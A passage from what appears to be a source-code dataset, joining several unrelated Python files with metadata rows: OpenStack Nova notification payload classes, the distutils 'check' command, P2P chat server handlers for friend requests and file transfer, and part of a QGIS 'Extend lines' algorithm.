'metadata': ('instance', 'metadata'),
'locked': ('instance', 'locked'),
'auto_disk_config': ('instance', 'auto_disk_config')
}
# Version 1.0: Initial version
# Version 1.1: add locked and display_description field
# Version 1.2: Add auto_disk_config field
# Version 1.3: Add key_name field
# Version 1.4: Add BDM related data
# Version 1.5: Add updated_at field
# Version 1.6: Add request_id field
VERSION = '1.6'
fields = {
'uuid': fields.UUIDField(),
'user_id': fields.StringField(nullable=True),
'tenant_id': fields.StringField(nullable=True),
'reservation_id': fields.StringField(nullable=True),
'display_name': fields.StringField(nullable=True),
'display_description': fields.StringField(nullable=True),
'host_name': fields.StringField(nullable=True),
'host': fields.StringField(nullable=True),
'node': fields.StringField(nullable=True),
'os_type': fields.StringField(nullable=True),
'architecture': fields.StringField(nullable=True),
'availability_zone': fields.StringField(nullable=True),
'flavor': fields.ObjectField('FlavorPayload'),
'image_uuid': fields.StringField(nullable=True),
'key_name': fields.StringField(nullable=True),
'kernel_id': fields.StringField(nullable=True),
'ramdisk_id': fields.StringField(nullable=True),
'created_at': fields.DateTimeField(nullable=True),
'launched_at': fields.DateTimeField(nullable=True),
'terminated_at': fields.DateTimeField(nullable=True),
'deleted_at': fields.DateTimeField(nullable=True),
'updated_at': fields.DateTimeField(nullable=True),
'state': fields.InstanceStateField(nullable=True),
'power_state': fields.InstancePowerStateField(nullable=True),
'task_state': fields.InstanceTaskStateField(nullable=True),
'progress': fields.IntegerField(nullable=True),
'ip_addresses': fields.ListOfObjectsField('IpPayload'),
'block_devices': fields.ListOfObjectsField('BlockDevicePayload',
nullable=True),
'metadata': fields.DictOfStringsField(),
'locked': fields.BooleanField(),
'auto_disk_config': fields.DiskConfigField(),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, bdms=None):
super(InstancePayload, self).__init__()
network_info = instance.get_network_info()
self.ip_addresses = IpPayload.from_network_info(network_info)
self.flavor = flavor_payload.FlavorPayload(flavor=instance.flavor)
if bdms is not None:
self.block_devices = BlockDevicePayload.from_bdms(bdms)
else:
self.block_devices = BlockDevicePayload.from_instance(instance)
# NOTE(Kevin_Zheng): Don't include request_id for periodic tasks,
# RequestContext for periodic tasks does not include project_id
# and user_id. Consider modify this once periodic tasks got a
# consistent request_id.
self.request_id = context.request_id if (context.project_id and
context.user_id) else None
self.populate_schema(instance=instance)
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionPayload(InstancePayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'fault': fields.ObjectField('ExceptionPayload', nullable=True),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, fault, bdms=None):
super(InstanceActionPayload, self).__init__(context=context,
instance=instance,
bdms=bdms)
self.fault = fault
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added key_name field to InstancePayload
# Version 1.2: Add BDM related data
# Version 1.3: Added updated_at field to InstancePayload
# Version 1.4: Added request_id field to InstancePayload
VERSION = '1.4'
fields = {
'volume_id': fields.UUIDField()
}
def __init__(self, context, instance, fault, volume_id):
super(InstanceActionVolumePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.volume_id = volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'old_volume_id': fields.UUIDField(),
'new_volume_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, old_volume_id, new_volume_id):
super(InstanceActionVolumeSwapPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.old_volume_id = old_volume_id
self.new_volume_id = new_volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreatePayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.2: Initial version. It starts at 1.2 to match with the version
# of the InstanceActionPayload at the time when this specific
# payload is created as a child of it so that the
# instance.create notification using this new payload does not
# have decreasing version.
# 1.3: Add keypairs field
# 1.4: Add key_name field to InstancePayload
# 1.5: Add BDM related data to InstancePayload
# 1.6: Add tags field to InstanceCreatePayload
# 1.7: Added updated_at field to InstancePayload
# 1.8: Added request_id field to InstancePayload
VERSION = '1.8'
fields = {
'keypairs': fields.ListOfObjectsField('KeypairPayload'),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, fault, bdms):
super(InstanceCreatePayload, self).__init__(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
self.keypairs = [keypair_payload.KeypairPayload(keypair=keypair)
for keypair in instance.keypairs]
self.tags = [instance_tag.tag
for instance_tag in instance.tags]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'new_flavor': fields.ObjectField('FlavorPayload', nullable=True)
}
def __init__(self, context, instance, fault, new_flavor):
super(InstanceActionResizePrepPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.new_flavor = new_flavor
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdatePayload(InstancePayload):
# Version 1.0: Initial version
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added tags field
# Version 1.3: Added auto_disk_config field to InstancePayload
# Version 1.4: Added key_name field to InstancePayload
# Version 1.5: Add BDM related data
# Version 1.6: Added updated_at field to InstancePayload
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'state_update': fields.ObjectField('InstanceStateUpdatePayload'),
'audit_period': fields.ObjectField('AuditPeriodPayload'),
'bandwidth': fields.ListOfObjectsField('BandwidthPayload'),
'old_display_name': fields.StringField(nullable=True),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, state_update, audit_period,
bandwidth, old_display_name):
super(InstanceUpdatePayload, self).__init__(
context=context, instance=instance)
self.state_update = state_update
self.audit_period = audit_period
self.bandwidth = bandwidth
self.old_display_name = old_display_name
self.tags = [instance_tag.tag
for instance_tag in instance.tags.objects]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescuePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'rescue_image_ref': fields.UUIDField(nullable=True)
}
def __init__(self, context, instance, fault, rescue_image_ref):
super(InstanceActionRescuePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.rescue_image_ref = rescue_image_ref
@nova_base.NovaObjectRegistry.register_notification
class IpPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'label': fields.StringField(),
'mac': fields.MACAddressField(),
'meta': fields.DictOfStringsField(),
'port_uuid': fields.UUIDField(nullable=True),
'version': fields.IntegerField(),
'address': fields.IPV4AndV6AddressField(),
'device_name': fields.StringField(nullable=True)
}
def __init__(self, label, mac, meta, port_uuid, version, address,
device_name):
super(IpPayload, self).__init__()
self.label = label
self.mac = mac
self.meta = meta
self.port_uuid = port_uuid
self.version = version
self.address = address
self.device_name = device_name
@classmethod
def from_network_info(cls, network_info):
"""Returns a list of IpPayload object based on the passed
network_info.
"""
ips = []
if network_info is not None:
for vif in network_info:
for ip in vif.fixed_ips():
ips.append(cls(
label=vif["network"]["label"],
mac=vif["address"],
meta=vif["meta"],
port_uuid=vif["id"],
version=ip["version"],
address=ip["address"],
device_name=vif["devname"]))
return ips
@nova_base.NovaObjectRegistry.register_notification
class BandwidthPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'network_name': fields.StringField(),
'in_bytes': fields.IntegerField(),
'out_bytes': fields.IntegerField(),
}
def __init__(self, network_name, in_bytes, out_bytes):
super(BandwidthPayload, self).__init__()
self.network_name = network_name
self.in_bytes = in_bytes
self.out_bytes = out_bytes
@nova_base.NovaObjectRegistry.register_notification
class AuditPeriodPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'audit_period_beginning': fields.DateTimeField(),
'audit_period_ending': fields.DateTimeField(),
}
def __init__(self, audit_period_beginning, audit_period_ending):
super(AuditPeriodPayload, self).__init__()
self.audit_period_beginning = audit_period_beginning
self.audit_period_ending = audit_period_ending
@nova_base.NovaObjectRegistry.register_notification
class BlockDevicePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
SCHEMA = {
'device_name': ('bdm', 'device_name'),
'boot_index': ('bdm', 'boot_index'),
'delete_on_termination': ('bdm', 'delete_on_termination'),
'volume_id': ('bdm', 'volume_id'),
'tag': ('bdm', 'tag')
}
fields = {
'device_name': fields.StringField(nullable=True),
'boot_index': fields.IntegerField(nullable=True),
'delete_on_termination': fields.BooleanField(default=False),
'volume_id': fields.UUIDField(),
'tag': fields.StringField(nullable=True)
}
def __init__(self, bdm):
super(BlockDevicePayload, self).__init__()
self.populate_schema(bdm=bdm)
@classmethod
def from_instance(cls, instance):
"""Returns a list of BlockDevicePayload objects based on the passed
bdms.
"""
if not CONF.notifications.bdms_in_notifications:
return None
instance_bdms = instance.get_bdms()
if instance_bdms is not None:
return cls.from_bdms(instance_bdms)
else:
return []
@classmethod
def from_bdms(cls, bdms):
"""Returns a list of BlockDevicePayload objects based on the passed
BlockDeviceMappingList.
"""
payloads = []
for bdm in bdms:
if bdm.volume_id is not None:
payloads.append(cls(bdm))
return payloads
@nova_base.NovaObjectRegistry.register_notification
class InstanceStateUpdatePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'old_state': fields.StringField(nullable=True),
'state': fields.StringField(nullable=True),
'old_task_state': fields.StringField(nullable=True),
'new_task_state': fields.StringField(nullable=True),
}
def __init__(self, old_state, state, old_task_state, new_task_state):
super(InstanceStateUpdatePayload, self).__init__()
self.old_state = old_state
self.state = state
self.old_task_state = old_task_state
self.new_task_state = new_task_state
@base.notification_sample('instance-delete-start.json')
@base.notification_sample('instance-delete-end.json')
@base.notification_sample('instance-pause-start.json')
@base.notification_sample('instance-pause-end.json')
@base.notification_sample('instance-unpause-start.json')
@base.notification_sample('instance-unpause-end.json')
@base.notification_sample('instance-resize-start.json')
@base.notification_sample('instance-resize-end.json')
@base.notification_sample('instance-resize-error.json')
@base.notification_sample('instance-suspend-start.json')
@base.notification_sample('instance-suspend-end.json')
@base.notification_sample('instance-power_on-start.json')
@base.notification_sample('instance-power_on-end.json')
@base.notification_sample('instance-power_off-start.json')
@base.notification_sample('instance-power_off-end.json')
@base.notification_sample('instance-reboot-start.json')
@base.notification_sample('instance-reboot-end.json')
@base.notification_sample('instance-reboot-error.json')
@base.notification_sample('instance-shutdown-start.json')
@base.notification_sample('instance-shutdown-end.json')
@base.notification_sample('instance-interface_attach-start.json')
@base.notification_sample('instance-interface_attach-end.json')
@base.notification_sample('instance-interface_attach-error.json')
@base.notification_sample('instance-shelve-start.json')
@base.notification_sample('instance-shelve-end.json')
@base.notification_sample('instance-resume-start.json')
@base.notification_sample('instance-resume-end.json')
@base.notification_sample('instance-restore-start.json')
@base.notification_sample('instance-restore-end.json')
@base.notification_sample('instance-evacuate.json')
@base.notification_sample('instance-resize_finish-start.json')
@base.notification_sample('instance-resize_finish-end.json')
@base.notification_sample('instance-live_migration_pre-start.json')
@base.notification_sample('instance-live_migration_pre-end.json')
@base.notification_sample('instance-live_migration_abort-start.json')
@base.notification_sample('instance-live_migration_abort-end.json')
# @base.notification_sample('instance-live_migration_post-start.json')
# @base.notification_sample('instance-live_migration_post-end.json')
@base.notification_sample('instance-live_migration_post_dest-start.json')
@base.notification_sample('instance-live_migration_post_dest-end.json')
@base.notification_sample('instance-live_migration_rollback-start.json')
@base.notification_sample('instance-live_migration_rollback-end.json')
# @base.notification_sample('instance-live_migration_rollback_dest-start.json')
# @base.notification_sample('instance-live_migration_rollback_dest-end.json')
@base.notification_sample('instance-rebuild-start.json')
@base.notification_sample('instance-rebuild-end.json')
@base.notification_sample('instance-rebuild-error.json')
@base.notification_sample('instance-interface_detach-start.json')
@base.notification_sample('instance-interface_detach-end.json')
@base.notification_sample('instance-resize_confirm-start.json')
@base.notification_sample('instance-resize_confirm-end.json')
@base.notification_sample('instance-resize_revert-start.json')
@base.notification_sample('instance-resize_revert-end.json')
@base.notification_sample('instance-shelve_offload-start.json')
@base.notification_sample('instance-shelve_offload-end.json')
@base.notification_sample('instance-soft_delete-start.json')
@base.notification_sample('instance-soft_delete-end.json')
@base.notification_sample('instance-trigger_crash_dump-start.json')
@base.notification_sample('instance-trigger_crash_dump-end.json')
@base.notification_sample('instance-unrescue-start.json')
@base.notification_sample('instance-unrescue-end.json')
@base.notification_sample('instance-unshelve-start.json')
@base.notification_sample('instance-unshelve-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionPayload')
}
@base.notification_sample('instance-update.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceUpdatePayload')
}
@base.notification_sample('instance-volume_swap-start.json')
@base.notification_sample('instance-volume_swap-end.json')
@base.notification_sample('instance-volume_swap-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumeSwapPayload')
}
@base.notification_sample('instance-volume_attach-start.json')
@base.notification_sample('instance-volume_attach-end.json')
@base.notification_sample('instance-volume_attach-error.json')
@base.notification_sample('instance-volume_detach-start.json')
@base.notification_sample('instance-volume_detach-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumePayload')
}
@base.notification_sample('instance-create-start.json')
@base.notification_sample('instance-create-end.json')
@base.notification_sample('instance-create-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceCreatePayload')
}
@base.notification_sample('instance-resize_prep-start.json')
@base.notification_sample('instance-resize_prep-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionResizePrepPayload')
}
@base.notification_sample('instance-snapshot-start.json')
@base.notification_sample('instance-snapshot-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionSnapshotPayload')
}
@base.notification_sample('instance-rescue-start.json')
@base.notification_sample('instance-rescue-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescueNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionRescuePayload')
}
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotPayload(InstanceActionPayload):
# Version 1.6: Initial version. It starts at version 1.6 as
# instance.snapshot.start and .end notifications are switched
# from using InstanceActionPayload 1.5 to this new payload and
# also it added a new field so we wanted to keep the version
# number increasing to signal the change.
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'snapshot_image_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, snapshot_image_id):
super(InstanceActionSnapshotPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.snapshot_image_id = snapshot_image_id
| apache-2.0 | -2,227,258,545,918,772,700 | 38.880763 | 79 | 0.673351 | false | 3.995063 | false | false | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.2/Lib/distutils/command/check.py | 1 | 5369 | """distutils.command.check
Implements the Distutils 'check' command.
"""
__revision__ = "$Id: check.py 85197 2010-10-03 14:18:09Z tarek.ziade $"
from distutils.core import Command
from distutils.errors import DistutilsSetupError
try:
# docutils is installed
from docutils.utils import Reporter
from docutils.parsers.rst import Parser
from docutils import frontend
from docutils import nodes
from io import StringIO
class SilentReporter(Reporter):
def __init__(self, source, report_level, halt_level, stream=None,
debug=0, encoding='ascii', error_handler='replace'):
self.messages = []
Reporter.__init__(self, source, report_level, halt_level, stream,
debug, encoding, error_handler)
def system_message(self, level, message, *children, **kwargs):
self.messages.append((level, message, children, kwargs))
HAS_DOCUTILS = True
except Exception:
# Catch all exceptions because exceptions besides ImportError probably
# indicate that docutils is not ported to Py3k.
HAS_DOCUTILS = False
class check(Command):
"""This command checks the meta-data of the package.
"""
description = ("perform some checks on the package")
user_options = [('metadata', 'm', 'Verify meta-data'),
('restructuredtext', 'r',
('Checks if long string meta-data syntax '
'are reStructuredText-compliant')),
('strict', 's',
'Will exit with an error if a check fails')]
boolean_options = ['metadata', 'restructuredtext', 'strict']
def initialize_options(self):
"""Sets default values for options."""
self.restructuredtext = 0
self.metadata = 1
self.strict = 0
self._warnings = 0
def finalize_options(self):
pass
def warn(self, msg):
"""Counts the number of warnings that occurs."""
self._warnings += 1
return Command.warn(self, msg)
def run(self):
"""Runs the command."""
# perform the various tests
if self.metadata:
self.check_metadata()
if self.restructuredtext:
if HAS_DOCUTILS:
self.check_restructuredtext()
elif self.strict:
raise DistutilsSetupError('The docutils package is needed.')
# let's raise an error in strict mode, if we have at least
# one warning
if self.strict and self._warnings > 0:
raise DistutilsSetupError('Please correct your package.')
def check_metadata(self):
"""Ensures that all required elements of meta-data are supplied.
name, version, URL, (author and author_email) or
(maintainer and maintainer_email)).
Warns if any are missing.
"""
metadata = self.distribution.metadata
missing = []
for attr in ('name', 'version', 'url'):
if not (hasattr(metadata, attr) and getattr(metadata, attr)):
missing.append(attr)
if missing:
self.warn("missing required meta-data: %s" % ', '.join(missing))
if metadata.author:
if not metadata.author_email:
self.warn("missing meta-data: if 'author' supplied, " +
"'author_email' must be supplied too")
elif metadata.maintainer:
if not metadata.maintainer_email:
self.warn("missing meta-data: if 'maintainer' supplied, " +
"'maintainer_email' must be supplied too")
else:
self.warn("missing meta-data: either (author and author_email) " +
"or (maintainer and maintainer_email) " +
"must be supplied")
def check_restructuredtext(self):
"""Checks if the long string fields are reST-compliant."""
data = self.distribution.get_long_description()
for warning in self._check_rst_data(data):
line = warning[-1].get('line')
if line is None:
warning = warning[1]
else:
warning = '%s (line %s)' % (warning[1], line)
self.warn(warning)
def _check_rst_data(self, data):
"""Returns warnings when the provided data doesn't compile."""
source_path = StringIO()
parser = Parser()
settings = frontend.OptionParser().get_default_values()
settings.tab_width = 4
settings.pep_references = None
settings.rfc_references = None
reporter = SilentReporter(source_path,
settings.report_level,
settings.halt_level,
stream=settings.warning_stream,
debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
try:
parser.parse(data, document)
except AttributeError:
reporter.messages.append((-1, 'Could not finish the parsing.',
'', {}))
return reporter.messages
| mit | -768,187,753,055,831,900 | 36.284722 | 78 | 0.575899 | false | 4.672759 | false | false | false |
cbrunker/quip | lib/Handlers.py | 1 | 11422 | #
# Response handlers for P2P Server
#
import asyncio
import logging
from functools import partial
from hashlib import sha1, sha384
from uuid import uuid4
from os import path
from lib.Database import getFriendRequests, getSigningKeys, setUidMask, storeAuthority, setFriendAuth, getMessageKeys, \
setAddress, getFileRequests, storeFileRequest, delFileRequests, delFriendRequests, getFriendChecksum, \
updateFriendDetails, storeHistory
from lib.Utils import isValidUUID, sha1sum
from lib.Constants import BTRUE, BFALSE, WRITE_END, COMMAND_LENGTH, NONEXISTANT, PROFILE_VALUE_SEPARATOR, \
LIMIT_AVATAR_SIZE, MODIFIED_FILE
######################################
# Server Dispatch Coroutine Handlers
######################################
@asyncio.coroutine
def friendAcceptance(reader, writer, safe, profileId, data, requests=None):
"""
Handle incoming friend request acceptance (P2P)
Once a request has been made, and the destination user accepts, the destination user contacts the request user
who runs this coroutine to complete the friendship.
Requester->Server (quip client, friendRequest)
Server->Destination (Heartbeat token)
Destination->Server (quip client, getRequests)
Destination->Requester (p2p client, friendCompletion) to (p2p server, this coroutine)
@param reader: StreamReader object
@param writer: StreamWriter objet
@param safe: crypto box
@param profileId: profile ID of logged in user
@param data: uid followed by hash of message
@param requests: (Optional) Recent outgoing friend requests {uid: message hash}
@return: Auth token
"""
if not requests:
requests = {}
# auth token
auth = None
try:
# verify required input data length
assert len(data) == 76
# user id, message hash
mhash, uid = data[:-36], data[-36:]
# valid UUID
assert isValidUUID(uid) is True
except AssertionError:
logging.info("\t".join(("Invalid friend completion data received", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), auth
if uid not in requests:
# check db for older requests
requests.update(getFriendRequests(safe, profileId))
# obtain request information for this user (uid)
try:
msg, timestamp, _, rowid = requests[uid]
except KeyError:
logging.warning("\t".join(("Friend Request Failure",
"No friend request found for given user ID", "UID: {!r}".format(uid))))
return b''.join((BFALSE, WRITE_END)), auth
# ensure our potential friend has the correct hash value for the friend request
try:
assert mhash.decode('ascii') == sha1(b''.join((uid, msg))).hexdigest()
except (UnicodeDecodeError, AssertionError):
logging.warning("\t".join(("Friend Request Failure", "Hash values do not match",
"Sent: {!r}".format(mhash),
"Local: {!r}".format(sha1(b''.join((uid, msg))).hexdigest()))))
return b''.join((BFALSE, WRITE_END)), auth
# hash value has matched, get public key
spub = getSigningKeys(safe, profileId)[1]
mpub = getMessageKeys(safe, profileId)[1]
# auth token sent to friend
token = bytes(str(uuid4()), encoding='ascii')
# create our auth token to be sent to server
auth = bytes(sha384(b''.join((uid, token))).hexdigest(), encoding='ascii')
# work out length of data
data = b''.join((token, spub, mpub))
# send length to read and auth token and public keys
writer.write(b''.join((bytes(str(len(data)), encoding='ascii'), WRITE_END, data)))
yield from writer.drain()
# recv back success to confirm storage of sent data by friend
success = yield from reader.readline()
try:
assert int(success[0]) == 49
int(success)
except (KeyError, ValueError):
logging.warning("\t".join(("Friend Request Warning",
"Friendship completion failed. Storage confirmation: {!r}".format(success))))
return b''.join((BFALSE, WRITE_END)), None
port = success[1:-1]
# receive length to read
data = yield from reader.readline()
try:
length = int(data)
except ValueError:
return b''.join((BFALSE, WRITE_END)), None
data = yield from reader.read(length)
fauth, spub, mpub = data[:36], data[36:100], data[100:]
try:
assert len(data) > 115
assert isValidUUID(fauth) is True
except AssertionError:
logging.error("\t".join(("Friend Request Failure",
"Invalid mask or public key provided", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), None
# created and store localised mask of friend's true ID
fmask = setUidMask(safe, profileId, uid)
# store friend's auth mask
# (the mask we use when submitting authorised requests to the hub server regarding this friend)
setFriendAuth(safe, profileId, fmask, fauth, auth)
# store public key for friend
storeAuthority(safe, profileId, fmask, spub, mpub)
# store address locally
setAddress(safe, profileId, fmask,
b':'.join((bytes(writer.transport.get_extra_info('peername')[0], encoding='ascii'), port)))
# delete local friend request storage
delFriendRequests(rowid)
# True for success of all required friendship steps, hash of auth token we sent to friend (must be sent to hub server)
return BTRUE, auth
@asyncio.coroutine
def requestSendFile(safe, profileId, mask, data):
"""
Handle and store request for file transfer
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
@param data: filename, size, checksum seperated by VALUE_SEPERATOR and user ID
@return: user id, filename, size
"""
try:
filename, size, checksum = data[:-36].split(bytes(PROFILE_VALUE_SEPARATOR, encoding='utf-8'))
except ValueError:
logging.info("Invalid file request data recieved: {!r}".format(data))
return False
checksum = checksum[:-COMMAND_LENGTH]
# validate received data
try:
# sha1 hex length
assert len(checksum) == 40
# size in bytes must be integer
int(size)
except AssertionError:
logging.info("Invalid file request data received, checksum is not correct length: {!r}".format(checksum))
return False
except ValueError:
logging.info("Invalid file request data received, size is not an integer: {!r}".format(size))
return False
# store file transfer request
rowid = storeFileRequest(safe, profileId, outgoing=False, mask=mask, request=(filename, size, checksum))
return data[-36:], filename, size, checksum, rowid
@asyncio.coroutine
def sendFile(writer, safe, profileId, mask, checksum, expiry, blockSize=4098):
"""
Send file to from server to client destination
@param writer: StreamWriter object to client
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
@param checksum: sha1 sum value of file to be sent
@param expiry: expire days for file transfer requests (config set value)
@param blockSize: total number of bytes to read at once
@return: True when file if completely sent, otherwise False
"""
try:
# obtain current requests for provided mask and clear expired requests
filename, size, rowid = getFileRequests(safe, profileId, outgoing=True, mask=mask, expire=expiry)[mask][checksum]
except KeyError:
logging.warning("\t".join(("File Transfer Failed",
"File transfer request does not exist for mask {} and checksum {}".format(mask, checksum))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
if not path.isfile(filename):
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File no longer exists: {}".format(filename))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
# match file checksum to ensure the same file which was to be sent
# has not been modified since the original transfer request
cursum = sha1sum(filename)
if checksum != cursum:
# remove invalid transfer request
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File has been modified",
"Filename: {}".format(filename),
"Original checksum: {}".format(checksum),
"Current checksum: {}".format(cursum))))
writer.write(MODIFIED_FILE)
yield from writer.drain()
return False
blockSize = int(blockSize)
with open(filename, 'rb') as fd:
for buf in iter(partial(fd.read, blockSize), b''):
writer.write(buf)
yield from writer.drain()
# remove file transfer request from storage
delFileRequests(rowid)
return True
@asyncio.coroutine
def receiveAvatar(reader, writer, safe, profileId, mask, checksum):
"""
Receive avatar update check from friend
@param reader: client streamreader object
@param writer: streamwriter object
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: friend mask uid
@param checksum: avatar sha1 checksum
@return: '0' if avatar not updated, otherwise locally calculated checksum value of stored avatar
"""
if len(checksum) != 40:
logging.warning("Friend mask '{}' tried to send invalid checksum value: {!r}".format(mask, checksum))
return BFALSE
try:
checksum = checksum.decode('ascii')
except UnicodeDecodeError:
return BFALSE
# compare local checksum value
if checksum != getFriendChecksum(safe, profileId, mask):
writer.write(BTRUE)
yield from writer.drain()
else:
return BFALSE
# get size of avatar to read from friend
size = yield from reader.readline()
try:
size = int(size)
assert size < LIMIT_AVATAR_SIZE
except (ValueError, AssertionError):
logging.warning("Friend mask '{}' tried to send invalid avatar size value: {!r}".format(mask, size))
return BFALSE
writer.write(BTRUE)
yield from writer.drain()
# read avatar into memory
avatar = yield from reader.readexactly(size)
# store avatar
storedChecksum = updateFriendDetails(safe, profileId, mask, avatar=avatar)
# send locally calculated checksum value as verification of storage
return storedChecksum
@asyncio.coroutine
def receiveMessage(safe, profileId, mask, data):
"""
Process data as recieved message
@param data: bytes/bytestring of msg and uid sent by client
@return: (user id, received message) if receive message exists, else False
"""
# msg portion of data
msg = data[:-36 - COMMAND_LENGTH]
rowid = storeHistory(safe, profileId, mask, msg, fromFriend=True)
# uid, msg
return (rowid, data[-36:], msg) if msg else False
#######################
# P2P Client Handlers
#######################
@asyncio.coroutine
def inviteChat():
pass
| gpl-3.0 | 8,537,975,647,144,394,000 | 35.492013 | 127 | 0.651112 | false | 4.276301 | false | false | false |
t-hey/QGIS-Original | python/plugins/processing/algs/qgis/ExtendLines.py | 1 | 2995 | # -*- coding: utf-8 -*-
"""
***************************************************************************
ExtendLines.py
--------------------
Date : October 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'October 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive323
__revision__ = '$Format:%H$'
from qgis.core import (QgsProcessingParameterNumber,
QgsProcessingException,
QgsProcessing)
from processing.algs.qgis.QgisAlgorithm import QgisFeatureBasedAlgorithm
class ExtendLines(QgisFeatureBasedAlgorithm):
START_DISTANCE = 'START_DISTANCE'
END_DISTANCE = 'END_DISTANCE'
def group(self):
return self.tr('Vector geometry')
def __init__(self):
super().__init__()
self.start_distance = None
self.end_distance = None
def initParameters(self, config=None):
self.addParameter(QgsProcessingParameterNumber(self.START_DISTANCE,
self.tr('Start distance'), defaultValue=0.0))
self.addParameter(QgsProcessingParameterNumber(self.END_DISTANCE,
self.tr('End distance'), defaultValue=0.0))
def name(self):
return 'extendlines'
def displayName(self):
return self.tr('Extend lines')
def outputName(self):
return self.tr('Extended')
def inputLayerTypes(self):
return [QgsProcessing.TypeVectorLine]
def prepareAlgorithm(self, parameters, context, feedback):
self.start_distance = self.parameterAsDouble(parameters, self.START_DISTANCE, context)
self.end_distance = self.parameterAsDouble(parameters, self.END_DISTANCE, context)
return True
def processFeature(self, feature, context, feedback):
input_geometry = feature.geometry()
if input_geometry:
output_geometry = input_geometry.extendLine(self.start_distance, self.end_distance)
